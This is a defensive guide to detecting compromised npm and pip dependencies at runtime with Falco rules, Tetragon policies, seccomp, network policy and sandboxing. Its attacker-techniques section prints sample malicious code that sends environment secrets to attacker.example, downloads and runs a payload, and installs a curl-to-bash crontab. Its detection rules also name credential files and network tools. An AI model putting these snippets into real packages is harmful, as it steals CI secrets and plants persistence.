Malicious Dependency Runtime Detection: Using eBPF to Catch Compromised Libraries
Problem
Static analysis catches known-bad packages. SBOM generation records what is installed. CVE scanners compare package versions against vulnerability databases. All of these controls share a common failure mode: they depend on the malicious package being already known.
A supply chain attacker who compromises a legitimate package — injecting malicious code into a new release of a popular npm or pip library — gets a clean bill of health from every static scanner for however long it takes the community to detect and report the compromise. Historical examples span hours to weeks: event-stream (npm, 2018), ctx and discordspy (PyPI, 2022), 3CX (2023), and numerous others. The window between a malicious package publish and detection is exactly when your systems are most exposed.
The controls that address this gap are behavioural: what does the package actually do at runtime? A legitimate library does not exec curl, write to /etc/cron.d, read /proc/*/environ across all processes, or open outbound TCP connections during installation. A compromised one often does exactly these things, because the attacker needs to exfiltrate secrets, establish persistence, or stage further payloads.
eBPF gives you syscall-level visibility into everything a process does — without modifying the process, without injecting agents, and without trusting the process’s own reporting. Falco turns that visibility into alerting rules. Tetragon turns it into enforceable policy that can kill a process mid-execution. Seccomp turns it into a syscall allowlist that prevents the operation entirely.
Target systems: Linux 5.8+ (Falco with CO-RE BPF driver); Linux 5.10+ (Tetragon); Kubernetes 1.27+ for Tetragon DaemonSet deployment; Ubuntu 22.04+, RHEL 9+, Fedora 38+.
Threat Model
- Adversary 1 — Injected postinstall exfil: An attacker modifies a popular npm package’s
package.jsonto add apostinstallscript. The script execscurlorwgetto send environment variables (containingAWS_SECRET_ACCESS_KEY,NPM_TOKEN,DATABASE_URL) to an attacker-controlled server. The package passes CVE scanning because no CVE exists yet. - Adversary 2 — pip install payload delivery: A compromised Python package’s
setup.pyincludes code that downloads a secondary payload from a remote URL duringpip install. The payload writes itself to~/.local/bin, adds a crontab entry, or patches a locally installed binary. - Adversary 3 — Dependency-shadowed binary: A dependency includes a native addon (
.nodeor.so) that at load time reads credential files (~/.aws/credentials,/run/secrets/*), encodes them, and sends them over DNS to bypass network egress controls. - Adversary 4 — Privilege escalation via library: A compromised library calls
setuid(0)or exploits a local vulnerability via a carefully crafted syscall sequence initiated from the library’s execution context, appearing to be legitimate application code. - Access level: Adversaries 1–3 operate at the privilege of the installing user (often CI runner, often with broad secret access). Adversary 4 may escalate from there.
- Objective: Secret exfiltration, persistent implant, lateral movement using stolen credentials.
- Blast radius: CI runners typically have access to secrets that span all environments. A compromised postinstall script running in CI can drain all secrets the runner can access.
Why Static Scanning Fails Here
SBOM generation and consumption establishes a bill of materials, but SBOMs record what is installed — they do not record what it does. A package that was legitimate when the SBOM was generated may be compromised in a subsequent version. A malicious package that has never been reported to any vulnerability database will appear clean in every SBOM scan.
The specific limits of static controls:
CVE databases lag. A zero-day supply chain compromise has no CVE. NVD ingestion of new CVEs averages days to weeks even after public disclosure. Your scanner is comparing against yesterday’s database.
Hash-based integrity only works post-detection. npm’s package-lock.json and pip’s requirements.txt hashes verify that you received the package the registry intended to give you — they do not verify the package’s intent. If the attacker modified the package at the source, your hash check passes.
Typosquatting and dependency confusion are pre-detection by definition. A typosquatting package or dependency confusion attack operates before any scanner knows the malicious package exists.
Code review at scale is impossible. Auditing the source of every transitive dependency on every version bump is not operationally feasible. Projects routinely have hundreds of transitive dependencies, each of which can update independently.
The practical conclusion: static controls are necessary but insufficient. Runtime behavioural detection is the layer that covers the zero-day window.
Attacker Techniques in Compromised Dependencies
Understanding the technique shapes the detection rule.
Environment variable harvesting via postinstall:
// injected into package.json postinstall script
const https = require('https');
const env = Buffer.from(JSON.stringify(process.env)).toString('base64');
https.get(`https://attacker.example/c2?d=${env}`);
Node.js postinstall scripts run with the full environment of the invoking process. In CI, that means every secret injected as an environment variable — registry tokens, cloud credentials, signing keys — is available.
Binary payload download in setup.py:
# injected into setup.py
import urllib.request, os, subprocess
url = 'https://attacker.example/payload.elf'
path = os.path.expanduser('~/.local/share/.config_helper')
urllib.request.urlretrieve(url, path)
os.chmod(path, 0o755)
subprocess.Popen([path], start_new_session=True)
setup.py runs arbitrary Python at install time with the installer’s privileges. pip install --no-build-isolation (common in older workflows) gives even broader access.
DNS exfiltration from native addons:
A .node native addon loaded via require() can call getaddrinfo() (DNS resolution) with encoded credential data in the hostname. DNS lookups typically bypass egress firewall rules that block direct TCP connections to unknown IPs.
Crontab persistence:
# postinstall.sh
echo "*/5 * * * * curl -s https://attacker.example/stage2 | bash" | crontab -
Writing a crontab entry or dropping a file in /etc/cron.d gives persistent execution that survives the install process.
eBPF for Runtime Detection
eBPF programs attach to kernel tracepoints, kprobes, and LSM hooks. When a process executes a syscall — execve, connect, open, write — the eBPF program fires synchronously in the kernel context, with full access to the syscall arguments and the process’s ancestry. This gives you a ground-truth view of behaviour that no user-space hook or agent can match: the process cannot lie about what syscalls it makes.
The key syscalls for supply chain detection:
execve/execveat: Did a dependency’s script exec an external binary (curl,wget,bash)?connect: Did a dependency’s process open an outbound TCP/UDP connection?openat/open: Did a dependency read sensitive files (/etc/passwd,/proc/*/environ,~/.aws/credentials)?writeto a file descriptor backed by cron path: Did a dependency write to/etc/cron.dor/var/spool/cron?setuid/setgid: Did a dependency attempt privilege escalation?
Falco Rules for Supply Chain Anomalies
Falco installs a BPF program (or kernel module) that generates structured events for every syscall matching a configured condition. Rules are YAML; conditions use a Sysdig-derived filter expression language.
Install Falco on the CI host or as a Kubernetes DaemonSet. The following rules target supply chain-specific behaviour.
Rule: npm postinstall execing network tools
- rule: npm_postinstall_network_exec
desc: >
A process spawned from npm or node during package install executed
a network utility (curl, wget, nc, python -c with urllib).
condition: >
spawned_process and
proc.name in (curl, wget, nc, ncat, python3, python) and
proc.pname in (npm, node, sh, bash) and
proc.aname[2] in (npm, node) and
not proc.cmdline contains "registry.npmjs.org" and
not proc.cmdline contains "registry.yarnpkg.com"
output: >
npm postinstall spawned network tool
(user=%user.name cmd=%proc.cmdline parent=%proc.pname
gparent=%proc.aname[2] container=%container.name image=%container.image.repository)
priority: CRITICAL
tags: [supply-chain, npm, network]
Rule: pip install opening outbound connections
- rule: pip_install_outbound_connect
desc: >
A process in the pip install ancestry opened an outbound TCP connection
to an unexpected destination during package installation.
condition: >
outbound and
proc.aname[0] in (pip, pip3, python, python3) and
fd.sport > 1024 and
not fd.sip in (151.101.0.0/16, 205.185.215.0/24) and
not fd.rport in (443, 80) and
not fd.rip in (pypi.org_ips)
output: >
pip install unexpected outbound connection
(user=%user.name proc=%proc.name cmd=%proc.cmdline
dest=%fd.rip:%fd.rport container=%container.name)
priority: CRITICAL
tags: [supply-chain, pip, network]
Rule: dependency process reading credential files
- rule: dependency_credential_read
desc: >
A process whose ancestor is a package manager opened a known credential file.
condition: >
open_read and
proc.aname[0] in (npm, pip, pip3, node, python, python3) and
(
fd.name startswith "/proc/" and fd.name endswith "/environ" or
fd.name in (/etc/passwd, /etc/shadow, /root/.ssh/id_rsa,
/root/.aws/credentials, /home/.aws/credentials) or
fd.name startswith "/run/secrets/"
)
output: >
Package manager child read credential file
(user=%user.name proc=%proc.name file=%fd.name
cmd=%proc.cmdline ancestor=%proc.aname[0] container=%container.name)
priority: CRITICAL
tags: [supply-chain, credential-access]
Rule: postinstall writing to cron paths
- rule: postinstall_cron_write
desc: >
A process descended from a package manager wrote to a cron directory,
indicating attempted persistence.
condition: >
open_write and
proc.aname[0] in (npm, pip, pip3, node, python, python3) and
(
fd.name startswith "/etc/cron" or
fd.name startswith "/var/spool/cron" or
fd.name = "/etc/crontab"
)
output: >
Package manager child wrote to cron path
(user=%user.name proc=%proc.name file=%fd.name
cmd=%proc.cmdline container=%container.name)
priority: CRITICAL
tags: [supply-chain, persistence]
Load custom rules by placing them in /etc/falco/rules.d/ and restarting Falco, or by hot-reloading with kill -1 $(pidof falco).
Tetragon TracingPolicy: Kernel-Level Enforcement
Tetragon goes further than Falco: it can kill a process at the point of detection, before the syscall completes. A TracingPolicy specifies kprobe or tracepoint attachment points, filter conditions, and actions including Sigkill.
TracingPolicy: kill any process reading /proc/*/environ from a package manager context
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
name: supply-chain-environ-read
spec:
kprobes:
- call: "fd_install"
syscall: false
args:
- index: 0
type: "int"
- index: 1
type: "file"
selectors:
- matchArgs:
- index: 1
operator: "Postfix"
values:
- "/environ"
matchAncestors:
- name: "npm"
- name: "pip3"
- name: "pip"
matchActions:
- action: Sigkill
- action: Post
rateLimit: "1m"
TracingPolicy: detect and kill outbound connect from build context
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
name: supply-chain-unexpected-connect
spec:
kprobes:
- call: "tcp_connect"
syscall: false
args:
- index: 0
type: "sock"
selectors:
- matchArgs:
- index: 0
operator: "NotDAddr"
values:
- "151.101.0.0/16"
- "205.185.215.0/24"
- "2a04:4e42::/32"
matchAncestors:
- name: "npm"
- name: "pip3"
matchActions:
- action: Sigkill
- action: Post
TracingPolicy: detect setuid call from library execution context
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
name: supply-chain-setuid-attempt
spec:
tracepoints:
- subsystem: "syscalls"
event: "sys_enter_setuid"
args:
- index: 0
type: "uint32"
selectors:
- matchArgs:
- index: 0
operator: "Equal"
values:
- "0"
matchBinaries:
- operator: "NotIn"
values:
- "/usr/bin/sudo"
- "/usr/bin/su"
- "/usr/bin/newgrp"
matchActions:
- action: Sigkill
- action: Post
Tetragon events are emitted as JSON to stdout of the tetragon container (or to a ring buffer), and integrate with Prometheus, Grafana, and SIEM systems via the tetra CLI or gRPC API.
Seccomp Profiles as Defence
Seccomp profiles operate at the syscall level: they allow or deny syscalls before execution, enforced by the kernel. A postinstall script or setup.py running under a restrictive seccomp profile cannot call syscalls that are blocked, regardless of what eBPF detects later.
For npm install containers, a restrictive seccomp profile blocks syscalls that no package installation legitimately needs:
{
"defaultAction": "SCMP_ACT_ERRNO",
"syscalls": [
{
"names": [
"read", "write", "openat", "close", "stat", "fstat", "lstat",
"mmap", "mprotect", "munmap", "brk", "rt_sigaction", "rt_sigprocmask",
"rt_sigreturn", "ioctl", "pread64", "pwrite64", "readv", "writev",
"access", "pipe", "select", "sched_yield", "mremap", "msync",
"mincore", "madvise", "dup", "dup2", "nanosleep", "getitimer",
"alarm", "setitimer", "getpid", "socket", "connect", "sendto",
"recvfrom", "sendmsg", "recvmsg", "shutdown", "bind", "listen",
"getsockname", "getpeername", "socketpair", "setsockopt", "getsockopt",
"clone", "fork", "vfork", "execve", "exit", "wait4", "kill",
"uname", "fcntl", "flock", "fsync", "fdatasync", "truncate",
"ftruncate", "getdents", "getcwd", "chdir", "rename", "mkdir",
"rmdir", "creat", "link", "unlink", "symlink", "readlink", "chmod",
"fchmod", "chown", "fchown", "lchown", "umask", "gettimeofday",
"getrlimit", "getrusage", "sysinfo", "times", "getuid", "syslog",
"getgid", "getppid", "getpgrp", "setsid", "geteuid", "getegid",
"getpgid", "getgroups", "setgroups", "getresuid", "getresgid",
"getdents64", "set_tid_address", "restart_syscall", "exit_group",
"waitid", "set_robust_list", "get_robust_list", "epoll_wait",
"epoll_ctl", "epoll_create", "futex", "newfstatat", "pselect6",
"ppoll", "arch_prctl", "getrandom"
],
"action": "SCMP_ACT_ALLOW"
},
{
"names": ["ptrace", "process_vm_readv", "process_vm_writev",
"setuid", "setgid", "setreuid", "setregid",
"setresuid", "setresgid", "capset", "prctl"],
"action": "SCMP_ACT_ERRNO",
"errnoRet": 1
}
]
}
Apply this in Kubernetes via a SecurityContext:
apiVersion: v1
kind: Pod
metadata:
name: npm-install-job
spec:
securityContext:
seccompProfile:
type: Localhost
localhostProfile: "supply-chain/npm-install.json"
containers:
- name: installer
image: node:22-alpine
command: ["npm", "ci"]
securityContext:
allowPrivilegeEscalation: false
runAsNonRoot: true
runAsUser: 1000
capabilities:
drop: ["ALL"]
ptrace is blocked because postinstall scripts have no legitimate reason to inspect other processes. setuid and related calls are blocked because package installation must not change privilege. The socket syscall remains in the allowlist here — remove it entirely if you enforce network isolation at the pod level via Kubernetes NetworkPolicy.
Network Policy During CI
Kubernetes NetworkPolicy enforces egress at the network level. For install steps in CI pipelines, restrict outbound connections to known registry CIDRs:
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: npm-install-egress
namespace: ci-runners
spec:
podSelector:
matchLabels:
phase: npm-install
policyTypes:
- Egress
egress:
- to:
- ipBlock:
cidr: 151.101.0.0/16
ports:
- protocol: TCP
port: 443
- to:
- ipBlock:
cidr: 104.16.0.0/12
ports:
- protocol: TCP
port: 443
- ports:
- protocol: UDP
port: 53
This allows HTTPS to Fastly (npm registry CDN) and Cloudflare, and DNS resolution, while blocking all other egress. A postinstall script attempting to connect to attacker.example will have the connection dropped by the CNI plugin before it leaves the pod.
For pip: PyPI resolves to Fastly (151.101.0.0/16) and AWS CloudFront (13.32.0.0/15, 54.192.0.0/12). Adjust accordingly.
Sandboxing npm install with bubblewrap and gVisor
Network policy and seccomp address the kernel-and-network surface. For defence-in-depth at the filesystem level, sandbox the install process so it cannot write outside its own working directory.
bubblewrap (bwrap): A lightweight sandboxing tool that uses Linux namespaces to restrict filesystem visibility.
bwrap \
--ro-bind /usr /usr \
--ro-bind /lib /lib \
--ro-bind /lib64 /lib64 \
--ro-bind /bin /bin \
--symlink usr/lib /lib \
--proc /proc \
--dev /dev \
--tmpfs /tmp \
--bind "$(pwd)/node_modules" "$(pwd)/node_modules" \
--bind "$(pwd)/package.json" "$(pwd)/package.json" \
--bind "$(pwd)/package-lock.json" "$(pwd)/package-lock.json" \
--unshare-net \
--unshare-user \
--uid 1000 \
--gid 1000 \
-- npm ci --ignore-scripts
--unshare-net removes network access entirely within the sandbox. --ro-bind makes the entire root filesystem read-only except the project directory. --ignore-scripts disables postinstall scripts; add this whenever your workflow does not depend on them (many do not).
gVisor: For CI environments running on Kubernetes, the runsc runtime intercepts all syscalls at a user-space kernel boundary. A compromised postinstall script making unusual syscalls hits gVisor’s interceptor before reaching the host kernel.
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
name: gvisor
handler: runsc
---
apiVersion: v1
kind: Pod
spec:
runtimeClassName: gvisor
containers:
- name: npm-install
image: node:22-alpine
command: ["npm", "ci"]
gVisor adds syscall overhead (10–30% for I/O-heavy workloads) but provides a hard boundary: a syscall that gVisor’s Sentry does not implement simply returns ENOSYS. Supply chain exploit code that depends on specific kernel internals will fail cleanly rather than succeed silently.
Response: Investigating a Falco Alert from a Dependency
When Falco fires a CRITICAL supply chain rule, the investigation sequence:
1. Contain immediately.
Do not wait for triage. Isolate the container:
# Kubernetes: cordon the node to prevent new scheduling
kubectl cordon <node-name>
# Remove the pod from service endpoints immediately
kubectl label pod <pod-name> app=quarantine --overwrite
# If you can tolerate the kill: delete the pod
kubectl delete pod <pod-name> --grace-period=0
2. Capture state before deletion.
# Capture the process tree at alert time (Tetragon has this in the event)
kubectl exec -n falco falco-<hash> -- \
tetra getevents --namespace ci-runners --pod <pod-name> \
--output json > incident-$(date +%s).json
# Get a filesystem snapshot if possible
kubectl debug <pod-name> -it --image=busybox --copy-to=debug-pod \
-- tar czf /tmp/rootfs.tar.gz /proc/1/root 2>/dev/null || true
3. Identify the package.
The Falco alert includes proc.cmdline and proc.aname — the full ancestor chain. The aname[0] gives you the package manager; aname[1] or proc.cmdline will contain the package name being installed.
Cross-reference against the build log: which npm install or pip install step was running at alert time? Which packages are new or bumped in the relevant package-lock.json or requirements.txt diff since the last clean build?
4. Inspect the package.
# For npm: extract and examine the postinstall script
npm pack <package>@<version>
tar xzf <package>.tgz
cat package/package.json | jq '.scripts'
cat package/install.js # or whatever the postinstall points to
# For pip: download and extract without executing
pip download <package>==<version> -d ./download --no-deps
cd download && unzip <wheel> -d extracted/
grep -r 'subprocess\|os\.system\|urllib\|requests\|socket' extracted/
5. Check the exfiltration destination.
If the Falco alert captured a connect event with fd.rip and fd.rport, look up the destination IP:
whois <fd.rip>
# Check against threat intel
curl "https://api.abuseipdb.com/api/v2/check?ipAddress=<fd.rip>" \
-H "Key: $ABUSEIPDB_KEY"
6. Rotate secrets.
Assume that any secret in the environment of the install process is compromised. Rotate immediately: registry tokens, cloud IAM credentials, signing keys, SSH keys. Do not wait for confirmation — the attacker already has them if the exfil connection completed before Falco fired.
7. File a security report.
Report to the package registry (npm security@npmjs.com; PyPI security@pypi.org) and open a GitHub advisory on the upstream repository. The community window between your detection and registry-level response is where other organisations are still installing the compromised version.
Controls Summary
| Control | Threat addressed | When it fires |
|---|---|---|
| Falco rules | Detection of anomalous exec/connect/read | At syscall, milliseconds post-event |
| Tetragon TracingPolicy with Sigkill | Prevention — terminates process mid-syscall | At syscall, before completion |
| Seccomp profile | Prevention — blocks disallowed syscalls entirely | At syscall entry |
| Kubernetes NetworkPolicy | Prevention — drops outbound connections | At packet egress |
| bubblewrap / gVisor | Containment — restricts filesystem and syscall surface | At install time |
| SBOM scanning | Detection of known-bad packages | Pre-install |
Static controls (SBOM) and runtime controls (eBPF, seccomp, network policy) are complementary. Static controls catch the known universe; runtime controls catch the zero-day window. Neither is sufficient alone.
The highest-leverage controls for CI pipelines are:
--ignore-scriptsonnpm ciwherever postinstall scripts are not required — this eliminates the largest attack surface without any tooling.- Network egress restriction to registry CIDRs only — this blocks the most common exfil and payload-download patterns at the infrastructure level.
- Falco rules for the cases that slip through — where postinstall scripts are legitimately needed and you need detection rather than prevention.
- Tetragon for automated response where detection latency matters — particularly in environments handling highly sensitive secrets.
The combination gives you defence-in-depth that static scanning alone cannot provide.